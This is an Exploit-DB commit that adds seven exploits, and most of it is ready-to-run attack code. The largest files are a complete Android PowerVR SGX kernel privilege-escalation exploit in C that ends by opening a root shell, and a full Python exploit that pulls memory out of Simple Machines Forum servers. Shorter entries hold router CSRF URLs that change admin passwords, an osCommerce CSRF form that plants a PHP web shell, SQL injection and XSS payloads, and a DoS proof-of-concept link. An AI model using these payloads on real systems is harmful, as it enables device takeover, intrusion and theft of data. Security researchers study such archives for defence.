DB: 2015-09-25

7 new exploits
This commit is contained in:
Offensive Security 2015-09-25 05:02:19 +00:00
parent bb2fcd6716
commit 44c9eb6ea9
8 changed files with 615 additions and 0 deletions

View file

@ -34594,3 +34594,10 @@ id,file,description,date,author,platform,type,port
38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
38307,platforms/win32/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win32,dos,0
38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0
38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery Vulnerability",2013-02-12,"Jakub Galczyk",php,webapps,0
38310,platforms/android/remote/38310.c,"Android <= 2.3.5 PowerVR SGX Driver Information Disclosure Vulnerability",2011-11-03,"Geremy Condra",android,remote,0
38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection Vulnerability",2013-02-12,ITTIHACK,php,webapps,0
38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0

Can't render this file because it is too large.

318
platforms/android/remote/38310.c Executable file
View file

@ -0,0 +1,318 @@
source: http://www.securityfocus.com/bid/57900/info
The PowerVR SGX driver in Android is prone to an information-disclosure vulnerability.
Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
Android 2.3.5 and prior versions are vulnerable.
/*
* levitator.c
*
* Android < 2.3.6 PowerVR SGX Privilege Escalation Exploit
* Jon Larimer <jlarimer@gmail.com>
* Jon Oberheide <jon@oberheide.org>
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1352
*
* CVE-2011-1352 is a kernel memory corruption vulnerability that can lead
* to privilege escalation. Any user with access to /dev/pvrsrvkm can use
* this bug to obtain root privileges on an affected device.
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1350
*
* CVE-2011-1350 allows leaking a portion of kernel memory to user mode
* processes. This vulnerability exists because of improper bounds checking
* when returning data to user mode from an ioctl system call.
*
* Usage:
*
* $ CC="/path/to/arm-linux-androideabi-gcc"
* $ NDK="/path/to/ndk/arch-arm"
* $ CFLAGS="-I$NDK/usr/include/"
* $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
* $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
* $ adb push levitator /data/local/tmp/
* $ adb shell
* $ cd /data/local/tmp
* $ ./levitator
* [+] looking for symbols...
* [+] resolved symbol commit_creds to 0xc00770dc
* [+] resolved symbol prepare_kernel_cred to 0xc0076f64
* [+] resolved symbol dev_attr_ro to 0xc05a5834
* [+] opening prvsrvkm device...
* [+] dumping kernel memory...
* [+] searching kmem for dev_attr_ro pointers...
* [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
* [+] clobbering kmem with poisoned pointers...
* [+] triggering privesc via block ro sysfs attribute...
* [+] restoring original dev_attr_ro pointers...
* [+] restored 16 dev_attr_ro pointers!
* [+] privileges escalated, enjoy your shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* The vulnerability affects Android devices with the PowerVR SGX chipset
* which includes popular models like the Nexus S and Galaxy S series. The
* vulnerability was patched in the Android 2.3.6 OTA update.
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#define CONNECT_SERVICES 0xc01c670c
#define DUMP_SIZE 161920
typedef struct {
uint32_t ui32BridgeID;
uint32_t ui32Size;
void *pvParamIn;
uint32_t ui32InBufferSize;
void *pvParamOut;
uint32_t ui32OutBufferSize;
void * hKernelServices;
} PVRSRV_BRIDGE_PACKAGE;
typedef int (* _commit_creds)(unsigned long cred);
typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
ssize_t
fake_disk_ro_show(void *dev, void *attr, char *buf)
{
commit_creds(prepare_kernel_cred(0));
return sprintf(buf, "0wned\n");
}
struct attribute {
const char *name;
void *owner;
mode_t mode;
};
struct device_attribute {
struct attribute attr;
ssize_t (*show)(void *dev, void *attr, char *buf);
ssize_t (*store)(void *dev, void *attr, const char *buf, size_t count);
};
struct device_attribute fake_dev_attr_ro = {
.attr = {
.name = "ro",
.mode = S_IRWXU | S_IRWXG | S_IRWXO,
},
.show = fake_disk_ro_show,
.store = NULL,
};
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sname[512];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (!f) {
return 0;
}
while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
return addr;
}
}
return 0;
}
int
do_ioctl(int fd, void *in, unsigned int in_size, void *out, unsigned int out_size)
{
PVRSRV_BRIDGE_PACKAGE pkg;
memset(&pkg, 0, sizeof(pkg));
pkg.ui32BridgeID = CONNECT_SERVICES;
pkg.ui32Size = sizeof(pkg);
pkg.ui32InBufferSize = in_size;
pkg.pvParamIn = in;
pkg.ui32OutBufferSize = out_size;
pkg.pvParamOut = out;
return ioctl(fd, 0, &pkg);
}
int
main(int argc, char **argv)
{
DIR *dir;
struct dirent *dentry;
int fd, ret, found, trigger;
char *dump, *dump_end, buf[8], path[256];
unsigned long dev_attr_ro, *ptr;
printf("[+] looking for symbols...\n");
commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] commit_creds symbol not found, aborting!\n");
exit(1);
}
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
exit(1);
}
dev_attr_ro = get_symbol("dev_attr_ro");
if (!dev_attr_ro) {
printf("[-] dev_attr_ro symbol not found, aborting!\n");
exit(1);
}
printf("[+] opening prvsrvkm device...\n");
fd = open("/dev/pvrsrvkm", O_RDWR);
if (fd == -1) {
printf("[-] failed opening pvrsrvkm device, aborting!\n");
exit(1);
}
printf("[+] dumping kernel memory...\n");
dump = malloc(DUMP_SIZE + 0x1000);
dump_end = dump + DUMP_SIZE + 0x1000;
memset(dump, 0, DUMP_SIZE + 0x1000);
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
if (ret == -1) {
printf("[-] failed during ioctl, aborting!\n");
exit(1);
}
printf("[+] searching kmem for dev_attr_ro pointers...\n");
found = 0;
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
if (*ptr == dev_attr_ro) {
*ptr = (unsigned long) &fake_dev_attr_ro;
found++;
}
}
printf("[+] poisoned %d dev_attr_ro pointers with fake_dev_attr_ro!\n", found);
if (found == 0) {
printf("[-] could not find any dev_attr_ro ptrs, aborting!\n");
exit(1);
}
printf("[+] clobbering kmem with poisoned pointers...\n");
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
if (ret == -1) {
printf("[-] failed during ioctl, aborting!\n");
exit(1);
}
printf("[+] triggering privesc via block ro sysfs attribute...\n");
dir = opendir("/sys/block");
if (!dir) {
printf("[-] failed opening /sys/block, aborting!\n");
exit(1);
}
found = 0;
while ((dentry = readdir(dir)) != NULL) {
if (strcmp(dentry->d_name, ".") == 0 || strcmp(dentry->d_name, "..") == 0) {
continue;
}
snprintf(path, sizeof(path), "/sys/block/%s/ro", dentry->d_name);
trigger = open(path, O_RDONLY);
if (trigger == -1) {
printf("[-] failed opening ro sysfs attribute, aborting!\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret = read(trigger, buf, sizeof(buf));
close(trigger);
if (strcmp(buf, "0wned\n") == 0) {
found = 1;
break;
}
}
if (found == 0) {
printf("[-] could not trigger privesc payload, aborting!\n");
exit(1);
}
printf("[+] restoring original dev_attr_ro pointers...\n");
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
if (ret == -1) {
printf("[-] failed during ioctl, aborting!\n");
exit(1);
}
found = 0;
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
if (*ptr == (unsigned long) &fake_dev_attr_ro) {
*ptr = (unsigned long) dev_attr_ro;
found++;
}
}
printf("[+] restored %d dev_attr_ro pointers!\n", found);
if (found == 0) {
printf("[-] could not restore any pointers, aborting!\n");
exit(1);
}
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
if (ret == -1) {
printf("[-] failed during ioctl, aborting!\n");
exit(1);
}
if (getuid() != 0) {
printf("[-] privileges not escalated, exploit failed!\n");
exit(1);
}
printf("[+] privileges escalated, enjoy your shell!\n");
execl("/system/bin/sh", "sh", NULL);
return 0;
}

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/57877/info
TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions.
TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.
http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save

232
platforms/php/webapps/38304.py Executable file
View file

@ -0,0 +1,232 @@
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#############################################################################
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
# Authors: Andrea Palazzo
# <andrea [dot] palazzo [at] truel [dot] it>
# Filippo Roncari
# <filippo [dot] roncari [at] truel [dot] it>
# Truel Lab ~ http://lab.truel.it
# Requirements: SMF <= 2.0.10
# PHP <= 5.6.11 / 5.5.27 / 5.4.43
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
# TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
# TL-2015-SMF01 n/y/a
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs
############################################################################
import sys, requests, time, os, socket, thread, base64, string, urllib
from multiprocessing import Process
#Payload Config
bytes_num = 000 #num of bytes to dump
address = 000 #starting memory address
#Target Config
cookie = {'PHPSESSID' : '000'} #SMF session cookie
target_host = 'http://localhost/smf/index.php' #URL of target installation index.php
csrftoken = ''
#Local Server Config
host = "localhost"
port = 31337
#Memory dump variables
dumped = ''
current_dump = ''
in_string = False
brute_index = 0
brute_list = list(string.ascii_letters + string.digits)
r_ok = 'HTTP/1.0 200 OK' + '\n'
r_re = 'HTTP/1.0 302 OK' + '\n'
r_body = '''Server: Truel-Server
Content-Type: text/xml
Connection: keep-alive
Content-Length: 395
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
<env:Header>
<n:alertcontrol xmlns:n="http://example.org/alertcontrol">
<n:priority>1</n:priority>
<n:expires>2001-06-22T14:00:00-05:00</n:expires>
</n:alertcontrol>
</env:Header>
<env:Body>
<m:alert xmlns:m="http://example.org/alert">
<m:msg>Truel</m:msg>
</m:alert>
</env:Body>
</env:Envelope>'''
def serverStart():
print "[+] Setting up local server on port " + str(port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if not sock:
print "[X] Fatal Error: Unable to create socket"
sock.bind((host, port))
sock.listen(1)
return sock
def getToken():
global csrftoken
print "[+] Trying to get a valid CSRF token"
for n in range(3): #3 attempts
r = requests.get(target_host, cookies=cookie, allow_redirects=False)
r = r.text
if(r.find("action=logout;")!=-1):
break
start = r.find("action=logout;")
if (start !=-1):
end = (r[start+14:]).find('">')
csrftoken = r[start+14 : start+end+14]
print "[+] Authentication done. Got token " + str(csrftoken)
return True
else:
print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
return False
def prepareForExploit():
if not(getToken()): #get CSRF token
os._exit(1)
target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
return
def forgePayload(current_try, address):
location = "http://" + current_try
payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
return payload
def sendPayload(payload,null):
target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
try:
r = requests.get(target, cookies=cookie, allow_redirects=False)
except requests.exceptions.RequestException:
print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
os._exit(1)
return
def limitReached(dumped):
if(len(dumped) >= bytes_num):
return True
else:
return False
def printDumped(dumped):
d = " "
cnt = 1
print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
print "[+] ======================= Dumped Data ======================="
for i in range(bytes_num):
d = d + str(dumped[i])
if (cnt % 48 == 0):
print d
d = " "
if (cnt == bytes_num):
print d
cnt = cnt + 1
def getSoapRequest(sock):
connection, sender = sock.accept()
request = connection.recv(8192)
return (connection, request)
def sendSoapResponse(connection, content):
connection.send(content)
connection.close()
return
def getDumpedFromHost(request):
i = request.find("Host: ") + 6
v = request[i:i+1]
return v
def pushDumped(value, string):
global dumped
global current_dump
global brute_index
global address
global in_string
dumped = str(value) + str(dumped)
if(string):
current_dump = str(value) + str(current_dump)
else:
current_dump = ""
in_string = string
address = address-1
brute_index = 0
print "[" + hex(address) + "] " + str(value)
return
def bruteViaResponse(sock):
global brute_index
current_try = ""
response_ok = r_ok + r_body
for n in range(19):
connection, request = getSoapRequest(sock)
if not request:
connection.close()
return False
if request.find("owned")!=-1:
pushDumped(getDumpedFromHost(request), True)
sendSoapResponse(connection,response_ok)
return True
else:
if((brute_index+1) == len(brute_list)):
sendSoapResponse(connection,response_ok)
return False
brute_index = brute_index + 1
if not in_string:
current_try = brute_list[brute_index]
else:
current_try = brute_list[brute_index] + str(current_dump)
response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
sendSoapResponse(connection,response_re)
connection, request = getSoapRequest(sock)
if request.find("owned")!=-1:
pushDumped(getDumpedFromHost(request), True)
sendSoapResponse(connection,response_ok)
return True
sendSoapResponse(connection,response_ok)
return False
def bruteViaRequest(sock):
global brute_index
brute_index = 0
current_try = ""
while(True):
if(brute_index == len(brute_list)):
pushDumped(".", False)
if limitReached(dumped):
printDumped(dumped)
return
if not in_string:
current_try = brute_list[brute_index]
else:
current_try = brute_list[brute_index] + str(current_dump)
payload = forgePayload(current_try,address)
thread.start_new_thread(sendPayload,(payload,""))
if not bruteViaResponse(sock):
brute_index = brute_index + 1
return
def runExploit():
print "[+] Starting exploit"
sock = serverStart()
prepareForExploit()
print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
bruteViaRequest(sock)
sock.close()
print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
sys.exit(0)
runExploit()

17
platforms/php/webapps/38309.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/57892/info
osCommerce is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
osCommerce 2.3.3 is vulnerable; other versions may also be affected.
The following example data is available:
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://www.example.com/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x24;&#x63;&#x6d;&#x64;">
</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/57910/info
BlackNova Traders is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/bnt/news.php?startdate=2013/02/11[SQLi]

15
platforms/php/webapps/38312.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/57948/info
AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AbanteCart 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E

8
platforms/win32/dos/38307.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=474
---
The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip